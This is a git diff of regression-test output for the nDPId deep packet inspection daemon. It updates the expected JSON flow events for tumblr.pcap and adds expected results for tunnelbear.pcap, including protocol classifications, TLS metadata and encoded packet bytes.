00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} 
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} 
00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -258,13 +258,13 @@ 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} 
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -278,9 +278,9 @@ ~~ total active/idle flows...: 47/47 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7071543 bytes -~~ total memory freed........: 7071543 bytes -~~ total allocations/frees...: 143134/143134 +~~ total memory allocated....: 7205177 bytes +~~ total memory freed........: 7205177 bytes +~~ total allocations/frees...: 145896/145896 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1395 chars diff --git a/test/results/tunnelbear.pcap.out b/test/results/tunnelbear.pcap.out new file mode 100644 index 000000000..372fd2e49 --- /dev/null +++ b/test/results/tunnelbear.pcap.out 
@@ -0,0 +1,163 @@ +00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tunnelbear.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tunnelbear.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655734524312} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524312,"flow_last_seen":1655734524312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524312,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655734524312,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524312,"pkt":"ABoRAAACABoRAAABCABFAAA8wQ5AAEAGbKcKCAABaBGa7MQCAbs6\/WaPAAAAAKAC\/\/8qygAAAgQFtAQCCAoBY6eBAAAAAAEDAwg="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655734524319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524319,"pkt":"ABoRAAACABoRAAABCABFAAAoAFRAABAGXXZoEZrsCggAAQG7xALFAplwOv1mkFAS\/\/\/dDQAA"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655734524319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524319,"pkt":"ABoRAAACABoRAAABCABFAAAowQ9AAEAGbLoKCAABaBGa7MQCAbs6\/WaQxQKZcVAQ\/\/\/dDgAA"} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734524312,"flow_last_seen":1655734524320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734524320,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524335,"flow_last_seen":1655734524335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1655734524335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524335,"pkt":"ABoRAAACABoRAAABCABFAAA8r3BAAEAGpgkKCAABaBFzKLAwAbtQpAj3AAAAAKAC\/\/+uSwAAAgQFtAQCCAoBY6eHAAAAAAEDAwg="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655734524340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524340,"pkt":"ABoRAAACABoRAAABCABFAAAoAFZAABAGhThoEXMoCggAAQG7sDCvW\/cIUKQI+FAS\/\/8YpAAA"} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524340,"flow_last_seen":1655734524340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1655734524340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734524340,"pkt":"ABoRAAACABoRAAABCABFAAA8hAJAAEAG0XcKCAABaBFzKLAyAbsgvSOFAAAAAKAC\/\/\/DogAAAgQFtAQCCAoBY6eHAAAAAAEDAwg="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1655734524343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734524343,"pkt":"ABoRAAACABoRAAABCABFAAAoAFdAABAGhTdoEXMoCggAAQG7sDLfQtx6IL0jhlAS\/\/8YogAA"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734524343,"flow_last_seen":1655734524343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734524343,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 